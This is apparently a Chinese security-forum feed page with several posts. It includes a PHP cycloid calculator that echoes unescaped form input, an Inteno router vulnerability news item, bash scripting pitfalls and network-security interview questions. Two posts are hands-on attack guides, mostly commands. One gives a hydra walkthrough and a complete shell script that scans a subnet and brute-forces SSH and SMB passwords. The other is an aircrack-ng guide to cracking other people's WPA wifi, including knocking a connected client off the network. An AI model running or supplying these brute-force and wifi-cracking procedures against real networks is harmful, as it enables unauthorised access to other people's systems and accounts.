php实现“计算摆线”,可以当做php的小练习!

编程katerina 发表了文章 • 7 个评论 • 520 次浏览 • 2016-09-06 19:22 • 来自相关话题

一、什么是摆线?
  摆线(cycloid)是数学中众多的迷人曲线之一.它是这样定义的:一个圆沿一直线缓慢地滚动,则圆上一固定点所经过的轨迹称为摆线。ps:来自百度百科
二、计算摆线的公式
  x=r; y=rr为圆的半径, t是圆的半径所经过的弧度(滚动角),当t由0变到2π时,动点就画出了摆线的一支,称为一拱。
三、实现源码
 
  输入“滚动角”和“半径”就能算出它的摆线,执行结果的截图如下:




 
<html>
<head>
<meta http-equiv="content-type" content="text/html ; charset=utf-8 ; "/><!-- 设置网页代码 -->
<title>计算摆线 php</title>
</head>
<body style="background-color: #6b5db0"></body>
<h3 style="color: #06b5db; text-align: left">php……………………计算摆线</h3>
<form style="color: #f6b5db; text-align: left" method="post">
半径:<input type = 'number_format' name='fnumr' />
角度:<input type = 'number_format' name='fnumb' />
<input type="submit" /> <br />

<?php
@$r = $_POST['fnumr'];
@$b = $_POST['fnumb'];
$pi = M_PI ;
echo " pi = " . $pi . "<br>" ;//输出pi值//
echo " r = " . $r . "<br>" ;
echo "角度:x;y" . "<br>" ;
$t = $b * $pi / 180 ;
echo "*[i][b][/i]" . $t . "[/b]***" ;
$x = $r * ( $t -sin($t));
$y = $r * (1- cos($t )) ;
echo $b . "^ : x = " . $x . ": y = " . $y . "<br>" . "<br>" ;//输出定值结果;
echo "特征数值 角度 :x:y" . "<br>" ;
for ( $a = 0; $a <= 12; $a++ )
{
$c = $a * 30 ;
$t = $c * $pi / 180 ;
$x = $r * ( $t - sin($t )) ;
$y = $r * (1 - cos($t )) ;
echo $c . "^ : x = " . $x . ": y = " . $y ."<br>" ;//输出特征结果//
}

?>
  代码里我都加了注释,假如有看不懂的,可以在评论区提问哦 查看全部
一、什么是摆线?
  摆线(cycloid)是数学中众多的迷人曲线之一.它是这样定义的:一个圆沿一直线缓慢地滚动,则圆上一固定点所经过的轨迹称为摆线。ps:来自百度百科
二、计算摆线的公式
  x=r; y=rr为圆的半径, t是圆的半径所经过的弧度(滚动角),当t由0变到2π时,动点就画出了摆线的一支,称为一拱。
三、实现源码
 
  输入“滚动角”和“半径”就能算出它的摆线,执行结果的截图如下:
jsbx.PNG

 
<html>
<head>
<meta http-equiv="content-type" content="text/html ; charset=utf-8 ; "/><!-- 设置网页代码 -->
<title>计算摆线 php</title>
</head>
<body style="background-color: #6b5db0"></body>
<h3 style="color: #06b5db; text-align: left">php……………………计算摆线</h3>
<form style="color: #f6b5db; text-align: left" method="post">
半径:<input type = 'number_format' name='fnumr' />
角度:<input type = 'number_format' name='fnumb' />
<input type="submit" /> <br />

<?php
@$r = $_POST['fnumr'];
@$b = $_POST['fnumb'];
$pi = M_PI ;
echo " pi = " . $pi . "<br>" ;//输出pi值//
echo " r = " . $r . "<br>" ;
echo "角度:x;y" . "<br>" ;
$t = $b * $pi / 180 ;
echo "*[i][b][/i]" . $t . "[/b]***" ;
$x = $r * ( $t -sin($t));
$y = $r * (1- cos($t )) ;
echo $b . "^ : x = " . $x . ": y = " . $y . "<br>" . "<br>" ;//输出定值结果;
echo "特征数值 角度 :x:y" . "<br>" ;
for ( $a = 0; $a <= 12; $a++ )
{
$c = $a * 30 ;
$t = $c * $pi / 180 ;
$x = $r * ( $t - sin($t )) ;
$y = $r * (1 - cos($t )) ;
echo $c . "^ : x = " . $x . ": y = " . $y ."<br>" ;//输出特征结果//
}

?>
  代码里我都加了注释,假如有看不懂的,可以在评论区提问哦

路由器现新漏洞:黑客远程劫持网络连接

安全资讯Shun 发表了文章 • 4 个评论 • 293 次浏览 • 2016-09-06 18:53 • 来自相关话题

近日,安全专家发现Inteno家用路由器中,可能存在一个安全漏洞。该漏洞会导致黑客可以远程对家中的路由器远程劫持和监控,并且将路由器的固件改造成黑客自制的版本,从而完全接管家中联网的设备。一旦这个漏洞被利用,用户通过自己家中的设备上网,将会跳转到黑客设置好的钓鱼网站,自己的个人隐私、社交网络账号和网银信息等都有被窃取的风险。
我们家中的路由器,通常与制造商的相关服务器进行通信,从而接收到最新的系统升级固件。这种更新方式,有一些Inteno路由器的型号不会验证服务器的证书,导致黑客可以干扰路由器与服务器之间的通信。从而诱导路由器与黑客自己组建的更新服务器通信,让路由器获取被污染的固件。路由器一旦更新到黑客自己的固件,用户所有的上网行为和网络流量都难逃其监控。
 
尤其是现在每个家庭不光是电脑接入路由器,智能手机、平板电脑、电视、智能家居设备都连上了WiFi,一旦路由器出现问题,这些设备都存在被攻击的安全风险。尤其是像用户名和密码为“admin”,或密码为“123456”这类简单密码的路由器,非常容易遭到破解。自己的个人信息和生活方式,将全部处在黑客的监控之下,非常可怕。
 
在此,我们建议大家及时更新自己家中无线路由器的固件。如果不相信路由器的自行升级,可至产品官网下载最新的官方固件,再进行本地升级工作。升级完成后,立即进入路由器的管理后台,把设置中的“远程管理”功能关闭。最后,我们还需要修改登录路由器管理后台的账户名称和密码,尽量使用复杂的用户名和密码,不使用默认的用户名和密码,提高安全等级。 查看全部
近日,安全专家发现Inteno家用路由器中,可能存在一个安全漏洞。该漏洞会导致黑客可以远程对家中的路由器远程劫持和监控,并且将路由器的固件改造成黑客自制的版本,从而完全接管家中联网的设备。一旦这个漏洞被利用,用户通过自己家中的设备上网,将会跳转到黑客设置好的钓鱼网站,自己的个人隐私、社交网络账号和网银信息等都有被窃取的风险。
我们家中的路由器,通常与制造商的相关服务器进行通信,从而接收到最新的系统升级固件。这种更新方式,有一些Inteno路由器的型号不会验证服务器的证书,导致黑客可以干扰路由器与服务器之间的通信。从而诱导路由器与黑客自己组建的更新服务器通信,让路由器获取被污染的固件。路由器一旦更新到黑客自己的固件,用户所有的上网行为和网络流量都难逃其监控。
 
尤其是现在每个家庭不光是电脑接入路由器,智能手机、平板电脑、电视、智能家居设备都连上了WiFi,一旦路由器出现问题,这些设备都存在被攻击的安全风险。尤其是像用户名和密码为“admin”,或密码为“123456”这类简单密码的路由器,非常容易遭到破解。自己的个人信息和生活方式,将全部处在黑客的监控之下,非常可怕。
 
在此,我们建议大家及时更新自己家中无线路由器的固件。如果不相信路由器的自行升级,可至产品官网下载最新的官方固件,再进行本地升级工作。升级完成后,立即进入路由器的管理后台,把设置中的“远程管理”功能关闭。最后,我们还需要修改登录路由器管理后台的账户名称和密码,尽量使用复杂的用户名和密码,不使用默认的用户名和密码,提高安全等级。

那些年我们踩得那些shell坑(二)

SHELL脚本ttgo2 发表了文章 • 6 个评论 • 494 次浏览 • 2016-09-06 17:39 • 来自相关话题

0x01 测试环境
 
OS:red hat 6.8
shell: bash shell
 
0x02 字符串“迷踪拳”
 
比较字符串是否相等?具体情况代码,,(看不懂的小白自行脑补。。)
 
#!/bin/bash
str1="tom"
str2="cat"
if [ "$str1"=="$str2" ]; then
echo "string is same"
else
echo "string is no same"
fi
 
 
0x03 测试结果
 
结果是什么呢?大家思考一下在往下看结果。。。。





 
0x04 坑位置
 
问题发生那里?大家是否可以自己思考一下?,有明白的可以抢先回答,稍后给大家公布答案?
 
0x05 答案公布
 
if 判断字符串的时候,记得在“==”两边加上空格
 
#!/bin/bash
str1="tom"
str2="cat"
if [ "$str1" == "$str2" ]; then
echo "string is same"
else
echo "string is no same"
fi
  查看全部
0x01 测试环境
 
OS:red hat 6.8
shell: bash shell
 
0x02 字符串“迷踪拳”
 
比较字符串是否相等?具体情况代码,,(看不懂的小白自行脑补。。)
 
#!/bin/bash
str1="tom"
str2="cat"
if [ "$str1"=="$str2" ]; then
echo "string is same"
else
echo "string is no same"
fi
 
 
0x03 测试结果
 
结果是什么呢?大家思考一下在往下看结果。。。。

QQ截图20160906173432.png

 
0x04 坑位置
 
问题发生那里?大家是否可以自己思考一下?,有明白的可以抢先回答,稍后给大家公布答案?
 
0x05 答案公布
 
if 判断字符串的时候,记得在“==”两边加上空格
 
#!/bin/bash
str1="tom"
str2="cat"
if [ "$str1" == "$str2" ]; then
echo "string is same"
else
echo "string is no same"
fi

 

那些年我们踩得那些shell坑(一)

SHELL脚本ttgo2 发表了文章 • 12 个评论 • 582 次浏览 • 2016-09-06 09:49 • 来自相关话题

0x1 环境介绍
 
  操作系统:red hat 6.8
 
  shell 类型:bash shell
 
0x2需求介绍
  
  循环输出目录下的".txt"文件(很简单吧。。。^^),那就边做边看吧。。。下面是目录下的文件
[root@localhost test]# ll

总用量 4

-rw-r--r--. 1 root root  0  8月 24 21:01 1- re.txt

-rw-r--r--. 1 root root  0  8月 24 21:01 2- re.txt

-rw-r--r--. 1 root root  0  8月 24 21:17 3.mp3

-rw-r--r--. 1 root root  0  8月 24 21:01 3- re.txt

-rw-r--r--. 1 root root  0  8月 24 21:17 4.mp3

-rwxr-xr-x. 1 root root 44  8月 24 21:09 for.sh

[root@localhost test]# 

0x3脚本开写, 如下;
 
#!/bin/bash
for i in `ls *.txt`;
do
echo $i
done

0x4运行结果,如下;
 
[root@localhost test]# ./for.sh 

1-

re.txt

2-

re.txt

3-

re.txt
 
这是什么鬼。。。跟自己想的完全不一样了
 
0x5坑位置
 
为什么会出现这样的问题呢? 因为for in 是根据空白符来分词的。。 是不是明白了?我们的文件名中间有空格,导致了这个问题
 
0x6 调整姿势
 
增加双引号,,改一下脚本,看看是否OK?
 
[root@localhost test]# cat for.sh 

#!/bin/bash

for i in "`ls *.txt`";

do

echo $i

done
 
测试结果

[root@localhost test]# ./for.sh 

1- re.txt 2- re.txt 3- re.txt    -----成了一个整体输出了,也不对
 
 
 
0x7 一起来
 
大家自己试试,,,稍后公布答案,,踊跃参加呀。。。。。
 
 0x8 答案揭晓 
 
#!/bin/bash
for i in *.txt;
do
echo $i
done
 
  查看全部
0x1 环境介绍
 
  操作系统:red hat 6.8
 
  shell 类型:bash shell
 
0x2需求介绍
  
  循环输出目录下的".txt"文件(很简单吧。。。^^),那就边做边看吧。。。下面是目录下的文件
[root@localhost test]# ll

总用量 4

-rw-r--r--. 1 root root  0  8月 24 21:01 1- re.txt

-rw-r--r--. 1 root root  0  8月 24 21:01 2- re.txt

-rw-r--r--. 1 root root  0  8月 24 21:17 3.mp3

-rw-r--r--. 1 root root  0  8月 24 21:01 3- re.txt

-rw-r--r--. 1 root root  0  8月 24 21:17 4.mp3

-rwxr-xr-x. 1 root root 44  8月 24 21:09 for.sh

[root@localhost test]# 

0x3脚本开写, 如下;
 
#!/bin/bash
for i in `ls *.txt`;
do
echo $i
done

0x4运行结果,如下;
 
[root@localhost test]# ./for.sh 

1-

re.txt

2-

re.txt

3-

re.txt

 
这是什么鬼。。。跟自己想的完全不一样了
 
0x5坑位置
 
为什么会出现这样的问题呢? 因为for in 是根据空白符来分词的。。 是不是明白了?我们的文件名中间有空格,导致了这个问题
 
0x6 调整姿势
 
增加双引号,,改一下脚本,看看是否OK?
 
[root@localhost test]# cat for.sh 

#!/bin/bash

for i in "`ls *.txt`";

do

echo $i

done
 
测试结果

[root@localhost test]# ./for.sh 

1- re.txt 2- re.txt 3- re.txt    -----成了一个整体输出了,也不对
 
 
 
0x7 一起来
 
大家自己试试,,,稍后公布答案,,踊跃参加呀。。。。。
 
 0x8 答案揭晓 
 

#!/bin/bash
for i in *.txt;
do
echo $i
done
 
 

论坛发起问题不能添加附件和图片

安全资讯kakaxi 回复了问题 • 7 人关注 • 6 个回复 • 586 次浏览 • 2016-09-05 20:30 • 来自相关话题

Linux下使用hydra获取linux和windows系统用户名和密码的教程

系统安全katerina 发表了文章 • 5 个评论 • 718 次浏览 • 2016-09-05 20:22 • 来自相关话题

本文主要记录了在linux中使用hydra破解并获取某个网段中linux和windows系统的登录名和密码。其中使用到的工具,例如,弱密码词典、用户名词典、shell脚本我都会传到我的资源里面。

第一步:找到网段内存活的主机

使用nmap工具查找存活的主机并存到up.txt里面,具体代码如下:

在命令行输入:nmap -sn 172.18.16.0/24 > up.txt 

从up.txt里面过滤出ip地址存到ip.txt里面,代码如下:

cat up.txt | grep for | awk '{print $5}'>ip.txt
 
第二步:使用nmap工具扫描linux和windows的远程端口

linux系统:

cat /etc/ssh/sshd_config 命令查看linux的远程端口,linux的远程端口是22,ssh协议。

windows系统:

开始—运行–cmd下输入 netstat –nba ,命令查看linux的远程端口,windows的远程端口是3389,smb协议。

查到远程登陆窗口后,使用nmap扫描22和3389的端口,代码如下:

nmap -p22,3389 -iL ip.txt > res.txt

第三步:从结果里过滤出22端口开着的ip地址

从结果里过滤出22端口开着的ip地址,存放到sship.txt里面,代码如下:

cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt


sship.txt里面的ip地址都是ssh远程开着的linux系统,接下来我们只要用hydra得到它们的密码就可以远程登陆linux系统了。

第四步:从结果里过滤出3389端口开着的ip地址

从结果里过滤出3389端口开着的ip地址,存放到smbip.txt里面,代码如下:

cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>smbip.txt

与第三步类似,smbip.txt里面的ip地址都是smb远程开着的windows系统,接下来我们只要用hydra得到它们的密码就可以远程登陆windows系统了。

第五步:使用hydra暴力破解linux密码

在命令行输入以下命令:

hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt

这段shell使用了user.txt用户名词典和passwd.txt密码词典以及开启ssh服务的ip地址,使用hydra进行暴力破解,从暴破结果中过滤取出ip地址对应的用户名和密码。


第六步:使用hydra暴力破解windows密码

hydra -L user.txt -P passwd.txt -M smbip.txt smb | grep passwd >> find.txt

与第五步相仿,不同的只是协议和ip地址。


第七步:使用找到的密码远程登陆

linux远程连接命令:

ssh -l root 172.18..

输入这个命令之后,系统会提示你输入密码passwd:,这时候你输入获取的密码就可以远程登陆了。

windows远程连接命令:

smb -l Administrator 172.18..

根据提示输入密码,就可以远程登陆了。

最后,我把这些命令写成了一个shell,如下:
 
#!/bin/sh
para1=$#
para2=$1
if [ $para1 -eq 0 ]; then
echo "请输入你的位置变量"
else
echo "-------------------stpe1 check up host list---------------------------"
echo "nmap -sn $para2 , please wait for moment......"
nmap -sn "$para2">up.txt
cat up.txt | grep for | awk '{print $5}'>ip.txt
echo "up host is done , save to up.txt"
echo "-------------------stpe2 port check 22 and 3389-----------------------"
echo "22 and 3389 port checking... please wait for moment......"
nmap -p22,3389 -iL ip.txt > res.txt
echo "-------------------stpe3 select 22 port------------------------------"
echo "doing 22 save to sship.txt"
cat res.txt | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt
echo "-------------------stpe4 select 3389 port----------------------------"
echo "doing 3389 save to 3389ip.txt"
cat res.txt | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>smbip.txt


echo "-----------------------------stpe5 attack ssh------------------------"
hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt


echo "-------------------------stpe6 attack 3389---------------------------"
hydra -L user.txt -P passwd.txt -M smbip.txt smb | grep passwd >> find.txt


cat -n find.txt


fi shell运行截图:
 





  查看全部
本文主要记录了在linux中使用hydra破解并获取某个网段中linux和windows系统的登录名和密码。其中使用到的工具,例如,弱密码词典、用户名词典、shell脚本我都会传到我的资源里面。

第一步:找到网段内存活的主机

使用nmap工具查找存活的主机并存到up.txt里面,具体代码如下:

在命令行输入:nmap -sn 172.18.16.0/24 > up.txt 

从up.txt里面过滤出ip地址存到ip.txt里面,代码如下:

cat up.txt | grep for | awk '{print $5}'>ip.txt
 
第二步:使用nmap工具扫描linux和windows的远程端口

linux系统:

cat /etc/ssh/sshd_config 命令查看linux的远程端口,linux的远程端口是22,ssh协议。

windows系统:

开始—运行–cmd下输入 netstat –nba ,命令查看linux的远程端口,windows的远程端口是3389,smb协议。

查到远程登陆窗口后,使用nmap扫描22和3389的端口,代码如下:

nmap -p22,3389 -iL ip.txt > res.txt

第三步:从结果里过滤出22端口开着的ip地址

从结果里过滤出22端口开着的ip地址,存放到sship.txt里面,代码如下:

cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt


sship.txt里面的ip地址都是ssh远程开着的linux系统,接下来我们只要用hydra得到它们的密码就可以远程登陆linux系统了。

第四步:从结果里过滤出3389端口开着的ip地址

从结果里过滤出3389端口开着的ip地址,存放到smbip.txt里面,代码如下:

cat res.txt  | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>smbip.txt

与第三步类似,smbip.txt里面的ip地址都是smb远程开着的windows系统,接下来我们只要用hydra得到它们的密码就可以远程登陆windows系统了。

第五步:使用hydra暴力破解linux密码

在命令行输入以下命令:

hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt

这段shell使用了user.txt用户名词典和passwd.txt密码词典以及开启ssh服务的ip地址,使用hydra进行暴力破解,从暴破结果中过滤取出ip地址对应的用户名和密码。


第六步:使用hydra暴力破解windows密码

hydra -L user.txt -P passwd.txt -M smbip.txt smb | grep passwd >> find.txt

与第五步相仿,不同的只是协议和ip地址。


第七步:使用找到的密码远程登陆

linux远程连接命令:

ssh -l root 172.18..

输入这个命令之后,系统会提示你输入密码passwd:,这时候你输入获取的密码就可以远程登陆了。

windows远程连接命令:

smb -l Administrator 172.18..

根据提示输入密码,就可以远程登陆了。

最后,我把这些命令写成了一个shell,如下:
 
#!/bin/sh  
para1=$#
para2=$1
if [ $para1 -eq 0 ]; then
echo "请输入你的位置变量"
else
echo "-------------------stpe1 check up host list---------------------------"
echo "nmap -sn $para2 , please wait for moment......"
nmap -sn "$para2">up.txt
cat up.txt | grep for | awk '{print $5}'>ip.txt
echo "up host is done , save to up.txt"
echo "-------------------stpe2 port check 22 and 3389-----------------------"
echo "22 and 3389 port checking... please wait for moment......"
nmap -p22,3389 -iL ip.txt > res.txt
echo "-------------------stpe3 select 22 port------------------------------"
echo "doing 22 save to sship.txt"
cat res.txt | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep ssh | awk '{print $5}'>sship.txt
echo "-------------------stpe4 select 3389 port----------------------------"
echo "doing 3389 save to 3389ip.txt"
cat res.txt | awk '/^Nmap/{T=$0;next;}{print T"\t"$0;}' | grep open | grep 3389 | awk '{print $5}'>smbip.txt


echo "-----------------------------stpe5 attack ssh------------------------"
hydra -L user.txt -P passwd.txt -M sship.txt ssh | grep passwd >> find.txt


echo "-------------------------stpe6 attack 3389---------------------------"
hydra -L user.txt -P passwd.txt -M smbip.txt smb | grep passwd >> find.txt


cat -n find.txt


fi
shell运行截图:
 

50.png

 

【面试题】网络安全工程师面试题tcp/ip篇

协议安全katerina 发表了文章 • 2 个评论 • 1066 次浏览 • 2016-09-05 20:18 • 来自相关话题

最近在面试网络安全工程师,在面试过程中网络基础知识必须满足以下几点:1、理解模型:尤其必须理解OSI、TCP/IP、Cisco和纵深防御网络模型。
2、理解第二层相关问题:包括了冲突域、广播域、交换与集线、端口安全以及生成树的相关主题
3、理解第三层相关问题:包含了IP路由协议;内部路由协议、如RIPv1/v2 和OSPF;外部路由协议,如BGP、子网络、超网络;网络地址转换(NAT)和IPv6
4、理解第四层相关问题:包含了TCP和UDP、会话的建立、报头和选项、端口地址转换以及常用端口
5、理解五到七层相关问题;包含了应用漏洞、特洛伊/蠕虫/病毒、内容过滤和IDS/ISP/IDP.

我又总结了一下在面试中经常被问到的知识点,算是比较全面的吧,如果大家发现了什么遗漏,希望大家可以提示一下,我会补充起来,方便大家共同学习进步~

下面就是总结的技术点(按照问题出现的频率排列):

1、讲一讲交换机的学习机制

2、TCP的半连接状态是怎样的?

3、什么是DDOS攻击?和DOS攻击有什么区别?

4、DHCP动态分配IP的过程是什么?它的原理是什么?

5、讲一讲什么是ARP协议?

6、ARP投毒过程和原理?该怎么防御ARP投毒?

7、讲一下TCP协议和UDP协议的区别?

8、讲一下TCP的三次握手过程

9、DHCP协议的功能?报文结构?

10、MAC泛红攻击的原理和过程?它的防御方式是什么?

11、ip报头格式是什么?

12、nat转换的原理是什么?和iptables的关系?

PS:后面我会把其中的一些技术写成博文,以便大家在面试中遇到该类问题时可以轻松回答,分分钟搞定面试官,成为牛X的黑客! 查看全部
最近在面试网络安全工程师,在面试过程中网络基础知识必须满足以下几点:1、理解模型:尤其必须理解OSI、TCP/IP、Cisco和纵深防御网络模型。
2、理解第二层相关问题:包括了冲突域、广播域、交换与集线、端口安全以及生成树的相关主题
3、理解第三层相关问题:包含了IP路由协议;内部路由协议、如RIPv1/v2 和OSPF;外部路由协议,如BGP、子网络、超网络;网络地址转换(NAT)和IPv6
4、理解第四层相关问题:包含了TCP和UDP、会话的建立、报头和选项、端口地址转换以及常用端口
5、理解五到七层相关问题;包含了应用漏洞、特洛伊/蠕虫/病毒、内容过滤和IDS/ISP/IDP.

我又总结了一下在面试中经常被问到的知识点,算是比较全面的吧,如果大家发现了什么遗漏,希望大家可以提示一下,我会补充起来,方便大家共同学习进步~

下面就是总结的技术点(按照问题出现的频率排列):

1、讲一讲交换机的学习机制

2、TCP的半连接状态是怎样的?

3、什么是DDOS攻击?和DOS攻击有什么区别?

4、DHCP动态分配IP的过程是什么?它的原理是什么?

5、讲一讲什么是ARP协议?

6、ARP投毒过程和原理?该怎么防御ARP投毒?

7、讲一下TCP协议和UDP协议的区别?

8、讲一下TCP的三次握手过程

9、DHCP协议的功能?报文结构?

10、MAC泛红攻击的原理和过程?它的防御方式是什么?

11、ip报头格式是什么?

12、nat转换的原理是什么?和iptables的关系?

PS:后面我会把其中的一些技术写成博文,以便大家在面试中遇到该类问题时可以轻松回答,分分钟搞定面试官,成为牛X的黑客!

【无线攻防】使用aircrack-ng工具破解wifi密码

无线安全katerina 发表了文章 • 11 个评论 • 679 次浏览 • 2016-09-05 20:04 • 来自相关话题

目前无线网络加密技术日益成熟。以前的wep加密方式日渐淘汰,因为这种加密方式非常容易破解,当然现在还是有不少使用这种加密方式无线网络。现在大部分的无线网络都是使用wpa/wpa2方式来加密的,这种加密方式安全系数高,很难破解,当然这也不是不可能的。

本文将教大家破解用wpa/wpa2加密方式的wifi密码。

现在就让我们开始吧!

工具(海淘回来的网卡):

工具:TL-WN722N 150M高增益USB无线网卡;

自己拍的图,如图1,TPLINK官网找的图,如图2;











第一步:

把USB网卡连接到电脑就能开始用了。

iwconfig,查看网卡有没有加载进来;






第二步:

airmon-ng start wlan0,开启网卡wlan0;
 





 
第三步:

airodump-ng wlan0mon,抓周围wif信号;
 





 
第一次抓周围wifi的时候失败了,我查看了一下,原因是有进程占用了网卡。

第四步:

airmon-ng check kill,杀死占用网卡的进程;
 





 
第五步:

airodump-ng wlan0mon,再次开启监控;
 





 
成功监控到,截图如下:
 


 
见谅一下我打的马赛克~~~~~~~~~~~~~~

第六步:

airodump-ng -c 6 --bssid 7C:A2:3E:87:5E:C0 -w tutu wlan0mon,对其中的一个wifi进行抓包;
 





 
-c 6 是它的CH,也就是信道;

--bssid 7C:A2:3E:87:5E:C0     AP的mac地址;

-w tutu 文件名称是tutu;

wlan0mon 网卡的名称;

抓包截图如下:
 





 
第七步:

假如你够幸运的话,有人连接wifi的话,在第六步就能抓到握手包。很显然我不是那个幸运的人,没办法,只能把wifi里连着的主机踢下去,等他再次连wifi的时候,就能成功滴抓到握手包啦。

踢人的命令:aireplay-ng -0 10 -a AP的mac地址 -c 你要踢掉的主机的mac地址 wlan0mon,成功踢掉,一踢掉他又自动连接了,这时候我成功滴抓到了握手包。截图如下:
 










 
第八步:

将抓到的包跑词典,爆破密码,截图如下:
 





 
就这样获取别人的WiFi密码啦~~~~ 查看全部
目前无线网络加密技术日益成熟。以前的wep加密方式日渐淘汰,因为这种加密方式非常容易破解,当然现在还是有不少使用这种加密方式无线网络。现在大部分的无线网络都是使用wpa/wpa2方式来加密的,这种加密方式安全系数高,很难破解,当然这也不是不可能的。

本文将教大家破解用wpa/wpa2加密方式的wifi密码。

现在就让我们开始吧!

工具(海淘回来的网卡):

工具:TL-WN722N 150M高增益USB无线网卡;

自己拍的图,如图1,TPLINK官网找的图,如图2;

123.jpg


TL-WN722N.jpg


第一步:

把USB网卡连接到电脑就能开始用了。

iwconfig,查看网卡有没有加载进来;

1.PNG


第二步:

airmon-ng start wlan0,开启网卡wlan0;
 

2.PNG

 
第三步:

airodump-ng wlan0mon,抓周围wif信号;
 

3.PNG

 
第一次抓周围wifi的时候失败了,我查看了一下,原因是有进程占用了网卡。

第四步:

airmon-ng check kill,杀死占用网卡的进程;
 

4.PNG

 
第五步:

airodump-ng wlan0mon,再次开启监控;
 

6.PNG

 
成功监控到,截图如下:
 


 
见谅一下我打的马赛克~~~~~~~~~~~~~~

第六步:

airodump-ng -c 6 --bssid 7C:A2:3E:87:5E:C0 -w tutu wlan0mon,对其中的一个wifi进行抓包;
 

7.PNG

 
-c 6 是它的CH,也就是信道;

--bssid 7C:A2:3E:87:5E:C0     AP的mac地址;

-w tutu 文件名称是tutu;

wlan0mon 网卡的名称;

抓包截图如下:
 

8.PNG

 
第七步:

假如你够幸运的话,有人连接wifi的话,在第六步就能抓到握手包。很显然我不是那个幸运的人,没办法,只能把wifi里连着的主机踢下去,等他再次连wifi的时候,就能成功滴抓到握手包啦。

踢人的命令:aireplay-ng -0 10 -a AP的mac地址 -c 你要踢掉的主机的mac地址 wlan0mon,成功踢掉,一踢掉他又自动连接了,这时候我成功滴抓到了握手包。截图如下:
 

9.PNG


13.PNG

 
第八步:

将抓到的包跑词典,爆破密码,截图如下:
 

13.PNG

 
就这样获取别人的WiFi密码啦~~~~

什么才是一个靠谱的弱口令字典?

口令安全wukong 回复了问题 • 7 人关注 • 6 个回复 • 1009 次浏览 • 2016-09-05 20:02 • 来自相关话题

来一些xss

编程糖醋黄瓜 回复了问题 • 6 人关注 • 8 个回复 • 619 次浏览 • 2016-09-05 19:55 • 来自相关话题